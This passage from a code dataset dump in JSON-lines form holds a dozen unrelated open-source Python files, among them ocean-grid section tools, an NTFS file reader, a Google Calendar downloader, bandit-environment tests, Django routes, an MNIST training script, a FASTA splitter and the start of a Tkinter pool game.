axes.plot([self.veci[indl]-.5, self.veci[indl]+.5],\n [self.vecj[indl]+.5, self.vecj[indl]+.5],\n color=col)\n\n if self.orient[indl] == 1:\n axes.scatter(self.veci[indl], self.vecj[indl]+.75,\n lw, marker='.', color=col)\n else:\n axes.scatter(self.veci[indl], self.vecj[indl]+.25,\n lw, marker='.', color=col)\n\n else:\n if cpt:\n lll = axes.plot([self.veci[indl]-.5, self.veci[indl]-.5],\n [self.vecj[indl]-.5, self.vecj[indl]+.5], **kwargs)\n col = lll[0].get_color()\n cpt = 0\n else:\n lll = axes.plot([self.veci[indl]-.5, self.veci[indl]-.5],\n [self.vecj[indl]-.5, self.vecj[indl]+.5],\n color=col)\n\n if self.orient[indl] == 1:\n axes.scatter(self.veci[indl]-.25, self.vecj[indl],\n lw, marker='.', color=col)\n else:\n axes.scatter(self.veci[indl]-.75, self.vecj[indl],\n lw, marker='.', color=col)\n\n axes.text(np.mean(self.veci), np.mean(self.vecj), self.name, color=col)\n\n return col\n\n\ndef extract_grid_sections(grid, sectionslist):\n\n \"\"\"\n Extract a list of GridSection objects from a grid\n object (containing coordinates and scale factors) and\n a list of section endpoints.\n\n :param pypago.grid.Grid grid: Input\n grid containing the coordinates, mask and scale factors.\n\n :param list sectionslist: List of pypago.sections.Section\n objects, containing section endpoints definitions.\n\n :return: A tuple containing the section in the model world\n (pypago.sections.GridSection objects) and the indexes of\n the discarded sections (i.e. sections out of the domain)\n\n \"\"\"\n\n # if the input is a section, converion into a list\n if isinstance(sectionslist, Section):\n sectionslist = [sectionslist]\n\n if not isinstance(sectionslist, list):\n message = 'The sectionslist argument must either be a single or a list of '\n message += 'pypago.sections.Section objects. This program will '\n message += 'be stopped.'\n raise PypagoErrors(message)\n\n output = []\n badsection = []\n for secind in range(0, len(sectionslist)):\n gridsec = GridSection(grid, sectionslist[secind])\n if gridsec.name is not None:\n output.append(gridsec)\n else:\n badsection.append(secind)\n\n return output, badsection\n\n\ndef correct_gridsec(gridsec, secname, offset, position):\n\n \"\"\"\n Function that allows to correct section staircases.\n Especially useful in order to correct sections' junctions. It extracts\n the section variables (`veci`, `vecj`, etc) along\n the length coordinates, from `offset` to `end` or from\n `start` to `offset`, depending on the value of `position` argument.\n\n :param list sec: section list that contains the |pypago|\n objects, containing the veci, vecj, vect, ... obtained\n from the :py:func:`pypago.pypago_sec.finalisesections`\n\n :param type secname: section points to correct\n\n :param int offset: number of points to remove\n\n :param str position: {'start','end'}\n whether we remove the first (position='start')\n or last (position='end') points.\n\n .. warning::\n\n The input list is modified\n\n \"\"\"\n\n nw = pypago.misc.findsecnum(gridsec, secname)\n\n if position == 'end':\n\n gridsec[nw].veci = gridsec[nw].veci[:-offset]\n gridsec[nw].vecj = gridsec[nw].vecj[:-offset]\n gridsec[nw].faces = gridsec[nw].faces[:-offset]\n gridsec[nw].orient = gridsec[nw].orient[:-offset]\n gridsec[nw].areavect = gridsec[nw].areavect[:, :-offset]\n gridsec[nw].depthvect = gridsec[nw].depthvect[:, :-offset]\n gridsec[nw].lvect = gridsec[nw].lvect[:-offset]\n gridsec[nw].lengthvect = gridsec[nw].lengthvect[:-offset]\n\n else:\n gridsec[nw].veci = gridsec[nw].veci[offset:]\n gridsec[nw].vecj = gridsec[nw].vecj[offset:]\n gridsec[nw].faces = gridsec[nw].faces[offset:]\n gridsec[nw].orient = gridsec[nw].orient[offset:]\n gridsec[nw].areavect = gridsec[nw].areavect[:, offset:]\n gridsec[nw].depthvect = gridsec[nw].depthvect[:, offset:]\n gridsec[nw].lvect = gridsec[nw].lvect[offset:]\n gridsec[nw].lengthvect = gridsec[nw].lengthvect[offset:]\n\n return gridsec\n","repo_name":"barriern/PyPago","sub_path":"pypago/sections.py","file_name":"sections.py","file_ext":"py","file_size_in_byte":15489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23654025866","text":"\nfrom ntfs import open_ntfs_file\n\n\ndef main(volume_drive: str, file_name: str) -> None:\n with open_ntfs_file(volume_drive, file_name) as ntfs_file:\n print(ntfs_file.read())\n\n\nif __name__ == \"__main__\":\n from logging import DEBUG, INFO, WARNING, ERROR\n from argparse import ArgumentParser\n\n from ntfs.utils import set_ntfs_log_level\n\n parser = ArgumentParser(\n description='Parse ntfs to retrieve a file\\'s content')\n parser.add_argument('volume_letter')\n parser.add_argument('file_name')\n parser.add_argument('-v', '--verbose', action='count')\n args = parser.parse_args()\n\n log_level = {1: WARNING, 2: INFO, 3: DEBUG}.get(args.verbose, ERROR)\n set_ntfs_log_level(log_level)\n\n main(args.volume_letter, args.file_name)\n","repo_name":"dan1994/ntfs_parser","sub_path":"ntfs_parser.py","file_name":"ntfs_parser.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16564587359","text":"\"\"\"Support code for dealing with stereotypes in diagrams.\"\"\"\n\nfrom gaphor.core.format import format\nfrom gaphor.core.styling import JustifyContent, TextAlign\nfrom gaphor.diagram.shapes import Box, Text, draw_top_separator\n\n\ndef stereotype_watches(presentation):\n presentation.watch(\"subject.appliedStereotype\", presentation.update_shapes).watch(\n \"subject.appliedStereotype.classifier.name\"\n ).watch(\"subject.appliedStereotype.slot\", presentation.update_shapes).watch(\n \"subject.appliedStereotype.slot.definingFeature.name\"\n ).watch(\"subject.appliedStereotype.slot.value\", presentation.update_shapes)\n\n\ndef stereotype_compartments(subject):\n return filter(\n None,\n (\n _create_stereotype_compartment(appliedStereotype)\n for appliedStereotype in subject.appliedStereotype\n )\n if subject\n else [],\n )\n\n\ndef _create_stereotype_compartment(appliedStereotype):\n def lazy_format(slot):\n return lambda: format(slot)\n\n slots = [slot for slot in appliedStereotype.slot if slot.value]\n\n if slots:\n return Box(\n Text(\n text=lazy_format(appliedStereotype.classifier[0])\n if appliedStereotype.classifier\n else \"\",\n style={\"padding\": (0, 0, 4, 0)},\n ),\n *(\n Text(text=lazy_format(slot), style={\"text-align\": TextAlign.LEFT})\n for slot in slots\n ),\n style={\n \"padding\": (4, 4, 4, 4),\n \"min-height\": 8,\n \"justify-content\": JustifyContent.START,\n },\n draw=draw_top_separator,\n )\n return None\n","repo_name":"gaphor/gaphor","sub_path":"gaphor/UML/classes/stereotype.py","file_name":"stereotype.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":1536,"dataset":"github-code","pt":"19"} +{"seq_id":"27872360039","text":"from __future__ import annotations\r\n\r\nimport datetime\r\nimport os\r\nimport time\r\nimport traceback\r\nfrom pprint import pprint as pp\r\nfrom typing import Any, Optional\r\n\r\n# Google imports\r\nfrom google.auth.exceptions import RefreshError\r\nfrom google.auth.transport.requests import Request\r\nfrom google.oauth2.credentials import Credentials\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom googleapiclient.discovery import Resource, build\r\n\r\nfrom neverlate.utils import app_local_data_dir, now_datetime\r\n\r\n# from googleapiclient.errors import HttpError\r\n\r\n# If modifying these scopes, delete the file token.json.\r\nSCOPES = [\"https://www.googleapis.com/auth/calendar.readonly\"]\r\n\r\nEMAIL = None\r\n\r\n\r\nclass Calendar:\r\n \"\"\"\r\n Google calendar data model\r\n \"\"\"\r\n\r\n summary: str\r\n id: str\r\n primary: bool\r\n selected: bool # Is the user displaying the calendary by default\r\n\r\n def __init__(self, data: dict[Any, Any]) -> None:\r\n self._data = data\r\n self.id = data[\"id\"]\r\n self.primary = data.get(\"primary\", False)\r\n self.summary = data.get(\"summaryOverride\", data.get(\"summary\", \"\"))\r\n if self.primary:\r\n self.selected = True\r\n elif self.summary == \"Birthdays\" or self.summary.lower().startswith(\"holiday\"):\r\n self.selected = False\r\n else:\r\n self.selected = data.get(\"selected\", False)\r\n\r\n def __repr__(self):\r\n if self.primary:\r\n return \"\"\r\n return (\r\n \"\"\r\n )\r\n\r\n\r\nclass TimeEvent:\r\n \"\"\"\r\n Calendar event data model for time-based events (not all day events).\r\n \"\"\"\r\n\r\n calendar: Calendar\r\n\r\n def __init__(self, item: dict[Any, Any], calendar: Calendar):\r\n \"\"\"\r\n Create the time event.\r\n\r\n Args:\r\n item (dict): Dictionary result from event query.\r\n calendar (Calendar): Calendar this event belongs to.\r\n\r\n Raises:\r\n ValueError: If item is not valid/not a valid event with a start date and time.\r\n \"\"\"\r\n if (\r\n \"start\" not in item\r\n or \"dateTime\" not in item[\"start\"]\r\n or item.get(\"eventType\", \"default\")\r\n != \"default\" # or ['default', 'focusTime', 'outOfOffice']:\r\n ):\r\n raise ValueError(\"Invalid data type - not a calendar event\")\r\n self.calendar = calendar\r\n self._event = item # type: dict[str, Any]\r\n self.summary = self._event.get(\"summary\", \"\")\r\n\r\n # Get start and end times as datetime objects\r\n st_time = self._event[\"start\"][\"dateTime\"]\r\n self.start_time = datetime.datetime.fromisoformat(st_time)\r\n # self.start_time = datetime.datetime.strptime(st_time[:19], \"%Y-%m-%dT%H:%M:%S\")\r\n end_time = self._event[\"end\"][\"dateTime\"]\r\n self.end_time = datetime.datetime.fromisoformat(end_time)\r\n self.id = \"::\".join(\r\n (\r\n self._event[\"id\"],\r\n self.start_time.isoformat(),\r\n self.get_video_url(),\r\n )\r\n )\r\n\r\n def __repr__(self):\r\n return (\r\n \"\"\r\n )\r\n\r\n def get_seconds_till_event(self) -> float:\r\n return (self.start_time - now_datetime()).total_seconds()\r\n\r\n def get_video_url(self) -> str:\r\n entry_points = self._event.get(\"conferenceData\", {}).get(\"entryPoints\", [])\r\n for entry_point in entry_points:\r\n if entry_point.get(\"entryPointType\", \"\") == \"video\":\r\n return entry_point[\"uri\"]\r\n\r\n # Occasionally there are events with links that aren't categorized but have URIs...\r\n for entry_point in entry_points:\r\n if \"entryPointType\" not in entry_point and entry_point.get(\"uri\"):\r\n return entry_point.get(\"uri\")\r\n return \"\"\r\n\r\n def has_declined(self) -> bool:\r\n for attendee in self._event.get(\"attendees\", []):\r\n # if attendee[\"email\"] == \"bwalters@wayfair.com\":\r\n return attendee[\"responseStatus\"] == \"declined\"\r\n return False\r\n\r\n def has_ended(self) -> bool:\r\n return (self.end_time - now_datetime()).total_seconds() < 0\r\n\r\n\r\nclass GoogleCalDownloader: # (QObject):\r\n \"\"\"Interface with Google. Credentials, downloading calendars, and downloading events.\"\"\"\r\n\r\n primary_calendar: Calendar # TODO: not used?\r\n calendars: list[Calendar] = []\r\n events: list[TimeEvent] = []\r\n last_update_time: float = 0.0\r\n\r\n # events_gathered_signal = Signal(list[Calendar])\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.service = None\r\n # self.service = build(\"calendar\", \"v3\", credentials=self.creds) # type: Resource\r\n self._cred_file_path = os.path.join(\r\n os.path.dirname(__file__), \"credentials.json\"\r\n )\r\n\r\n self.user_token_file_path = os.path.join(app_local_data_dir(), \"token.json\")\r\n\r\n def logout(self):\r\n \"\"\"\r\n Remove the user token file and disconnect the service.\r\n \"\"\"\r\n if os.path.exists(self.user_token_file_path):\r\n os.remove(self.user_token_file_path)\r\n\r\n self.service = None\r\n\r\n def login(self, require_existing_credentials: bool = False) -> bool:\r\n \"\"\"Gets google authentication credentails.\"\"\"\r\n creds = self.get_existing_credentials()\r\n if require_existing_credentials and not creds:\r\n return False\r\n if not creds:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n self._cred_file_path, SCOPES\r\n )\r\n creds = flow.run_local_server(port=0)\r\n\r\n # Save the credentials for the next run\r\n with open(self.user_token_file_path, \"w\") as token_file:\r\n token_file.write(creds.to_json())\r\n\r\n self.service = build(\"calendar\", \"v3\", credentials=creds) # type: Resource\r\n return True\r\n\r\n def get_existing_credentials(self) -> Credentials | None:\r\n \"\"\"\r\n Check if we have valid credentials or not.\r\n\r\n Returns:\r\n Credentials|None\r\n \"\"\"\r\n creds = None\r\n if not os.path.exists(self.user_token_file_path):\r\n return None\r\n creds = Credentials.from_authorized_user_file(self.user_token_file_path, SCOPES)\r\n if creds.valid:\r\n return creds\r\n if creds.expired and creds.refresh_token:\r\n try:\r\n creds.refresh(Request())\r\n\r\n # Save the credentials for the next run\r\n with open(self.user_token_file_path, \"w\") as token_file:\r\n token_file.write(creds.to_json())\r\n return creds\r\n except RefreshError:\r\n return None\r\n\r\n def update_calendars(self) -> None:\r\n result = self.service.calendarList().list().execute()\r\n cal_ids = []\r\n for cal in result[\"items\"]:\r\n if 0:\r\n print(\"=\" * 80)\r\n pp(cal)\r\n continue\r\n if cal.get(\"deleted\"):\r\n continue\r\n cal = Calendar(cal)\r\n cal_ids.append(cal)\r\n\r\n self.calendars = cal_ids\r\n\r\n def update_events(self, calendars: Optional[list[Calendar]] = None) -> None:\r\n events = []\r\n if calendars is None:\r\n calendars = self.calendars\r\n\r\n for calendar in calendars:\r\n events += self.get_events(calendar)\r\n self.events = events\r\n self.last_update_time = time.time()\r\n # self.events_gathered_signal.emit()\r\n\r\n def get_events(self, calendar: Calendar) -> list[TimeEvent]:\r\n \"\"\"Get amazing events.\r\n\r\n Args:\r\n calendar (Calendar): calendar to get events from.\r\n\r\n Returns:\r\n list[TimeEvent]\r\n \"\"\"\r\n # Call the Calendar API\r\n\r\n # now_ = datetime.datetime.utcnow().isoformat() + \"Z\" # 'Z' indicates UTC time\r\n # time_min = now.replace(hour=0, minute=0, second=0, microsecond=0)\r\n # time_max = now.replace(hour=23, minute=59, second=59, microsecond=0)\r\n now_ = now_datetime()\r\n time_min = now_.replace(hour=0, minute=0, second=0)\r\n time_max = now_.replace(hour=23, minute=59, second=59)\r\n # print(\"Cal:\", calendar.summary, \"---\", calendar.id)\r\n events_query = self.service.events().list( # type: ignore\r\n calendarId=calendar.id,\r\n maxAttendees=1,\r\n timeMin=time_min.isoformat(),\r\n timeMax=time_max.isoformat(),\r\n maxResults=250,\r\n singleEvents=True,\r\n # orderBy=\"startTime\",\r\n )\r\n events_result = events_query.execute()\r\n\r\n # pp(events_result)\r\n # print(\" Items:\", len(events_result[\"items\"]))\r\n\r\n items = events_result.get(\"items\", [])\r\n result = []\r\n # Prints the start and name of the next 10 events\r\n for item in items:\r\n try:\r\n event = TimeEvent(item, calendar)\r\n except ValueError:\r\n # print(\"Invalid event\", item.get(\"summary\", \"\"))\r\n continue\r\n except:\r\n # Unknown error needs to be handled\r\n print(traceback.format_exc())\r\n continue\r\n result.append(event)\r\n\r\n return result\r\n\r\n\r\nif __name__ == \"__main__\":\r\n gcal = GoogleCalDownloader()\r\n gcal.update_calendars()\r\n gcal.update_events()\r\n","repo_name":"beewally/neverlate","sub_path":"neverlate/google_cal_downloader.py","file_name":"google_cal_downloader.py","file_ext":"py","file_size_in_byte":10483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35346635329","text":"\"\"\"Test environments.\"\"\"\nfrom gym.spaces import Discrete\nfrom gym.wrappers import TimeLimit\nfrom hypothesis import given\nfrom hypothesis.strategies import floats, integers, lists\n\nfrom src import NonMarkovianRotatingMAB\n\n\nclass BaseTestRotMAB:\n \"\"\"Base test class for RotMAB environment.\"\"\"\n\n def __init__(self, winning_probs, max_steps):\n \"\"\"Initialize test class.\"\"\"\n self.winning_probs = winning_probs\n self.max_steps = max_steps\n self.env = TimeLimit(\n NonMarkovianRotatingMAB(winning_probs=self.winning_probs),\n max_episode_steps=self.max_steps,\n )\n\n def test_action_space(self):\n \"\"\"Test action spaces.\"\"\"\n assert self.env.action_space == Discrete(len(self.winning_probs))\n\n def test_observation_space(self):\n \"\"\"Test observation spaces.\"\"\"\n assert self.env.observation_space == Discrete(2)\n\n def test_interaction(self):\n \"\"\"Test interaction with Rotating MAB.\"\"\"\n self.env.seed()\n state = self.env.reset()\n assert state == 0\n\n def assert_consistency(obs, reward):\n \"\"\"Assert obs = 1 iff reward = 1.\"\"\"\n positive_reward = reward > 0.0\n positive_obs = obs == 1\n assert (\n positive_reward\n and positive_obs\n or (not positive_reward and not positive_obs)\n )\n\n for _i in range(self.max_steps - 1):\n action = self.env.action_space.sample()\n obs, reward, done, info = self.env.step(action)\n assert_consistency(obs, reward)\n assert not done\n\n # last action\n obs, reward, done, info = self.env.step(0)\n assert_consistency(obs, reward)\n assert done\n\n\n@given(\n winning_probs=lists(floats(0.0, 1.0), min_size=1, max_size=200),\n max_steps=integers(min_value=1, max_value=200),\n)\ndef test_robmabs(winning_probs, max_steps):\n \"\"\"Test many instances of rotmabs.\"\"\"\n test = BaseTestRotMAB(winning_probs, max_steps)\n\n test.test_action_space()\n test.test_observation_space()\n test.test_interaction()\n","repo_name":"marcofavorito/PAC-RDPs-code","sub_path":"tests/test_envs/test_rotmab.py","file_name":"test_rotmab.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"70362576683","text":"import json\nimport socket\n\ndef kill_node(id,address):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((address, 8080+id))\n m = json.dumps({'sender':'kill','type':'kill', 'message':'kill'})\n s.sendall(bytes(m,\"utf-8\"))\n s.close()\n\n\ndef kill_all_nodes(n,address):\n for i in range(n):\n kill_node(i+1,address)\n\n\n\n\n\ndef client(n,ip):\n on = 1\n while on:\n addr = input(\"address ? \")\n port = int(input(\"port ? \"))\n if port == 0:\n kill_all_nodes(n,ip)\n on = 0\n break\n\n type = input('command ? ')\n jsonb = None\n\n if type == \"create_transaction\":\n sender = int(input('sender ? '))\n receiver = int(input('receiver ? '))\n amount = int(input('amount ? '))\n\n jsonb = {\"type\": type, 'transaction':{'sender':sender,'receiver':receiver,'amount':amount}}\n\n elif type == \"fake\":\n jsonb = {\"type\": type, 'transaction':{'sender':12,'receiver':23,'amount':100}}\n\n else:\n jsonb = {\"type\": type}\n data_send = json.dumps(jsonb)\n\n \n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind((ip,8080))\n s.connect((addr, port))\n s.sendall(bytes(data_send,\"utf-8\"))\n s.shutdown(socket.SHUT_RDWR) \n\n\n\nclient(6,'127.0.0.1')","repo_name":"Xioshiva/lab1-blockchain","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28735492191","text":"# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\nfrom odoo import models\n\n\nclass AccountInvoice(models.Model):\n\n _inherit = 'account.invoice'\n\n def action_invoice_open(self):\n res = super().action_invoice_open()\n for invoice in self:\n if invoice.type == 'in_invoice':\n for line in invoice.invoice_line_ids:\n pur_line = line.purchase_line_id\n if pur_line and line.price_subtotal > 0 and \\\n line.product_id.cost_method == 'fifo':\n inv_price = line._get_stock_move_price_unit()\n for move in pur_line.move_ids:\n if move._is_in() and move.remaining_qty > 0:\n remaining_value = move.remaining_qty * \\\n inv_price\n move.write({\n 'remaining_value': remaining_value})\n return res\n\n\nclass AccountInvoiceLine(models.Model):\n\n _inherit = 'account.invoice.line'\n\n def _get_stock_move_price_unit(self):\n self.ensure_one()\n invoice = self.invoice_id\n price_unit = self.price_unit\n if self.invoice_line_tax_ids:\n price_unit = self.invoice_line_tax_ids.with_context(\n round=False).compute_all(\n price_unit, currency=self.invoice_id.currency_id,\n quantity=1.0, product=self.product_id,\n partner=self.invoice_id.partner_id\n )['total_excluded']\n if self.uom_id.id != self.product_id.uom_id.id:\n price_unit *= self.uom_id.factor / self.product_id.uom_id.factor\n if invoice.currency_id != invoice.company_id.currency_id:\n price_unit = invoice.currency_id.with_context(\n date=invoice.date).compute(\n price_unit, invoice.company_id.currency_id, round=False)\n if self.discount:\n return price_unit * (1 - self.discount / 100)\n return price_unit\n","repo_name":"pranav-1into2/Minsk","sub_path":"external_modules/account_invoice_move_cost/models/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"33000621687","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom hospital import settings\nfrom hospital_app import views\nfrom django.conf.urls.static import static\nurlpatterns = [\n path('', views.user_login, name ='home'),\n path('index',views.index),\n path('signin',views.user_login, name ='signin'),\n path('create_user', views.create_user),\n path('signout', views.signout, name ='signout'),\n path('reg', views.reg, name='reg'),\n path('record',views.records, name='record'),\n path('update/',views.update, name='update'),\n path('updated/',views.updated,name='updated'),\n path('delete/',views.delete,name='delete'),\n path('del2/',views.del2),\n path('check_in',views.check_in,name='check_in'),\n path('reg_det',views.reg_det,name=\"reg_det\"),\n path('check2',views.check2),\n path('check3',views.check3),\n path('logs',views.logs),\n path('appointment-page',views.appointment),\n path('staff',views.staff),\n path('newstaff',views.newstaff),\n path('staffrec',views.managestaff),\n path('appointments',views.appointments),\n path('vitals',views.vitals),\n path('select/',views.select),\n path('doctors',views.doctors),\n path('action1//',views.action1),\n path('getdoc',views.getdoc),\n path('error',views.error),\n path('first',views.first_page),\n path('second_page',views.second_page),\n path('lab',views.lab),\n path('lab2/',views.lab2),\n path('messages', views.message),\n path('message2/',views.message2),\n path('message',views.message_search),\n path('print/',views.printc),\n path('qrcode',views.qr_gen),\n path('patient_details',views.p_details)\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"ofe14/HOSPTAL-MANAGEMENT-SYSTEM","sub_path":"hospital_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13812746949","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\nimport os\nimport shutil\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom deep_MNIST_model import DeepNeuralNetwork\n\nimport tensorflow as tf\n\nFLAGS = None\n\n\ndef main(_):\n # Import data\n mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)\n\n # Create the model\n x = tf.placeholder(tf.float32, [None, 784], name='input')\n y_ = tf.placeholder(tf.float32, [None, 10], name='answer')\n\n # Build the graph for the deep net\n model = DeepNeuralNetwork()\n y_conv, keep_prob = model.deepnn(x)\n\n with tf.name_scope('loss'):\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv)\n cross_entropy = tf.reduce_mean(cross_entropy)\n\n with tf.name_scope('adam_optimizer'):\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\n with tf.name_scope('accuracy_check'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n correct_prediction = tf.cast(correct_prediction, tf.float32)\n accuracy = tf.reduce_mean(correct_prediction)\n tf.add_to_collection('accuracy', accuracy)\n\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(300):\n batch = mnist.train.next_batch(50)\n if i % 100 == 0:\n train_accuracy = sess.run(accuracy, feed_dict={\n x: batch[0], y_: batch[1], keep_prob: 1.0})\n print('step %d, training accuracy %g' % (i, train_accuracy))\n sess.run(train_step, feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n\n print('test accuracy %g' % sess.run(accuracy, feed_dict={\n x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\n save_path = \"models/deep_MNIST_save/ver1.2\"\n if os.path.exists(save_path):\n shutil.rmtree(save_path)\n os.mkdir(save_path)\n saver.save(sess, save_path)\n print(\"Model saved in file: %s\" % save_path)\n\n with tf.Session() as new_sess:\n # new_saver = tf.train.import_meta_graph('models/deep_MNIST_save/ver1.1.meta')\n print(\"Model load in file: %s\" % save_path)\n\n new_saver = tf.train.Saver()\n new_saver.restore(new_sess, save_path)\n print(\"Model is restored: %s\" % save_path)\n new_accuracy = tf.get_collection('accuracy')[0]\n print('test new_accuracy %g' % new_accuracy.eval(feed_dict={\n x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_dir', type=str,\n default='/tmp/tensorflow/mnist/input_data',\n help='Directory for storing input data')\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"sgr0416st/tensorflow","sub_path":"deep_MNIST_save_ver1.2.py","file_name":"deep_MNIST_save_ver1.2.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70546867565","text":"#!/usr/bin/env python\n#\n# splits multi-fasta file into single, with \n\nimport argparse\nimport logging\nimport os\nimport sys\nimport traceback\n\nclass NumSeqReachedException(Exception):\n pass\n\n\nclass Sequence(object):\n\n def __init__(self, accession, geneid, sequence=\"\"):\n self.accession = accession\n self.geneid = geneid\n self.sequence = sequence\n\n def addsequence(self, sequence):\n self.sequence += sequence\n \n def asfasta(self):\n s = \">%s|%s\\n%s\" % ( self.accession, self.geneid, self.sequence)\n return s\n\n\nclass ProcessingRun(object):\n \n def __init__(self, filelist, workdir, numseq):\n self.log = logging.getLogger()\n self.filelist = filelist\n self.workdir = os.path.expanduser(workdir)\n self.workdir = os.path.abspath(self.workdir)\n if not os.path.exists(self.workdir):\n os.mkdir(self.workdir)\n self.log.info(\"Created workdir %s\" % self.workdir)\n self.numseq = int(numseq)\n self.numoutput = 0\n\n def outputlast(self, seq):\n if seq is not None:\n logging.debug(seq.asfasta())\n try:\n filename = '%s/%s.fasta' % (self.workdir, seq.geneid)\n fh = open(filename, 'w')\n fh.write(seq.asfasta())\n self.numoutput += 1\n except IOError as ioe:\n print(\"error opening file %s\" % filename)\n \n finally:\n fh.close()\n \n \n def parsefile(self, filehandle):\n current = None\n try:\n for line in filehandle:\n if line.startswith(\">\"):\n if current is not None:\n current.addsequence(\"\\n\")\n self.outputlast(current)\n if self.numoutput >= self.numseq:\n raise NumSeqReachedException\n \n fields = line.split(\"|\")\n accession = fields[1]\n fields2 = fields[2].split()\n geneid = fields2[0]\n logging.debug('header: accessno=%s id=%s' % (accession, geneid))\n current = Sequence(accession, geneid)\n elif line.strip().startswith(\"#\"):\n pass\n else:\n s = line.strip()\n current.addsequence(s) \n except NumSeqReachedException:\n raise\n \n \n except Exception as e:\n traceback.print_exc(file=sys.stdout) \n\n \n def handlefiles(self): \n for filename in self.filelist:\n filename = os.path.abspath(filename)\n \n try:\n self.log.debug(\"opening file %s\" % filename)\n filehandle = open(filename, 'r')\n self.parsefile(filehandle)\n filehandle.close()\n \n except FileNotFoundError:\n self.log.error(\"No such file %s\" % filename) \n except NumSeqReachedException:\n self.log.info(\"Desired number of sequences reached %d\" % self.numseq)\n \n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s (UTC) [ %(levelname)s ] %(name)s %(filename)s:%(lineno)d %(funcName)s(): %(message)s')\n \n parser = argparse.ArgumentParser()\n \n parser.add_argument('-d', '--debug', \n action=\"store_true\", \n dest='debug', \n help='debug logging')\n\n parser.add_argument('-v', '--verbose', \n action=\"store_true\", \n dest='verbose', \n help='verbose logging')\n\n parser.add_argument('infiles', \n metavar='infiles', \n type=str, \n nargs='+',\n help='a list of .fasta sequence files')\n \n parser.add_argument('-w', '--workdir', \n action=\"store\", \n dest='workdir', \n default='~/work/cafa4-play/seqwork',\n help='run-specific workdir [~/work/cafa4-play/seqwork]')\n\n parser.add_argument('-n', '--numseq', \n action=\"store\", \n dest='numseq', \n default=100,\n help='number of sequences to process. ') \n \n \n args= parser.parse_args()\n \n if args.debug:\n logging.getLogger().setLevel(logging.DEBUG)\n if args.verbose:\n logging.getLogger().setLevel(logging.INFO)\n \n filelist = args.infiles \n run = ProcessingRun(filelist, args.workdir, args.numseq)\n run.handlefiles()\n\n\n ","repo_name":"jhover/cshlwork","sub_path":"attic/fastasplit.py","file_name":"fastasplit.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32229409448","text":"import Tkinter as TK\r\nimport math\r\nimport time\r\nimport random\r\n\r\nstart_time = time.time()\r\ntimes = [0]\r\ndef timer():\r\n return (time.time() - start_time)\r\n \r\n\r\nroot = TK.Tk()\r\nroot.wm_title('MiniPool')\r\n\r\ndimensions = (1600,900)\r\ncanvas = TK.Canvas(root, width=dimensions[0], height=dimensions[1], background='#FFFFFF')\r\ncanvas.grid(row=0, column=0, columnspan=4)\r\n\r\ntable_size = (1200,600)\r\nmargins = ((dimensions[0]-table_size[0])/2,(dimensions[1]-table_size[1])/2)\r\ncushion = {'left':margins[0],'top':margins[1],'right':margins[0]+table_size[0],'bottom':margins[1]+table_size[1]}\r\ncanvas.create_rectangle(cushion['left'],cushion['top'],cushion['right'],cushion['bottom'],fill='#1e7228')\r\n\r\nballs = []\r\nvels = []\r\nhit_x_cushion = []\r\nhit_y_cushion = []\r\ncollided = []\r\n\r\ndef create_ball(radius, color, x_pos, y_pos, x_vel, y_vel):\r\n balls.append(canvas.create_oval(x_pos - radius, y_pos - radius, x_pos + radius, y_pos + radius, fill = color, outline = color))\r\n vels.append([float(x_vel), float(y_vel)])\r\n hit_x_cushion.append(False)\r\n hit_y_cushion.append(False)\r\n \r\ndef hexstring(slider_int):\r\n '''A function to prepare data from controller's widget for view's consumption\r\n \r\n slider_intvar is an IntVar between 0 and 255, inclusive\r\n hexstring() returns a string representing two hexadecimal digits\r\n '''\r\n \r\n slider_hex = 